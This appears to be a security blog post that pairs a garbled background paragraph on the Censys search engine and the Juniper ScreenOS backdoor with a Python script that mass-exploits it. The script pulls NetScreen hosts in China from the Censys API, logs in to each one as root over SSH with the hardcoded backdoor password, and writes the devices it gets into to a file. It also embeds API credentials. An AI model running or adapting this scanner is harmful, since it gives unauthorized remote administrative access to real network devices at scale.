Background:
Censys is a networking device to search for information about new search engine, security experts can use it to evaluate their programs to achieve security, hackers can use it as a preliminary investigation target, target information collected powerful weapon. Its function is very similar to the very popular Shodan, however, compared with the Shodan its advantage is that this is a free search engine, originally published by researchers at the University of Michigan in October, is currently supported by Google. Chief Information Security Officer Bob Worrall Juniper’s senior vice president, said, discovered two vulnerabilities in recent internal code audit process, the impact of ScreenOS 6.2.0r15-6.2.0r18,6.3.0r12-6.3.0r20 version. One is not authorization code vulnerabilities can be decrypted VPN traffic; another could allow an attacker to remotely manage through SSH or telnet access device.
Juniper mentioned that access to these systems will be recorded, password authentication will be successful, but the attacker can change or delete the log entry.
JuniperBackdoor.py Script:
from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math
user = "root"
passwd = "<<< %s(un='%s') = %u"
API_URL = "https://www.censys.io/api/v1"
UID = "373ab943-2e4b-4088-b1ac-396c0c21ce2c"
SECRET = "sRwAT71mrRJnyZBD95sjEjkFLXRjP5n6"
PAGES = 50
cur_page = 1
thread_num = 20
queue = Queue()
class testTarget(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global queue
while True:
for i in range(5):
if not queue.empty():
ip = queue.get()
else:
break
theSSH = connectSSH(ip, user, passwd)
if theSSH:
before = theSSH.before
try:
theSSH.logout()
except:
pass
isval = re.search('Remote Management Console', before)
if isval:
print "%s is vul" % ip
ip_OK.write("%s\n" % ip)
ip_OK.flush()
else:
print "%s is not vul" %ip
time.sleep(1)
def connectSSH(host, user, passwd):
try:
ssh = pxssh.pxssh()
ssh.login(host, user, passwd, auto_prompt_reset = False)
return ssh
except Exception, e:
print "%s is not vul" % host
def getIp(page):
start_time = time.time()
data = {
"query":"22.ssh.banner.software_version:NetScreen location.country:China",
"page":page,
"fields":["ip"]
}
try:
res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
except:
pass
else:
try:
results = res.json()
except:
pass
else:
if res.status_code != 200:
print "error occurred: %s" % results["error"]
sys.exit(1)
else:
result_iter = iter(results["results"])
for result in result_iter:
queue.put(result["ip"])
def test():
for i in range(thread_num):
t = testTarget()
t.start()
if __name__ == '__main__':
ip_OK = open("ip_OK.txt", "w")
getIp(cur_page)
test()
while queue.qsize() > 0:
if cur_page <= PAGES:
getIp(cur_page)
cur_page += 1
time.sleep(0.1)
ip_OK.close()Source : https://github.com/s0m30ne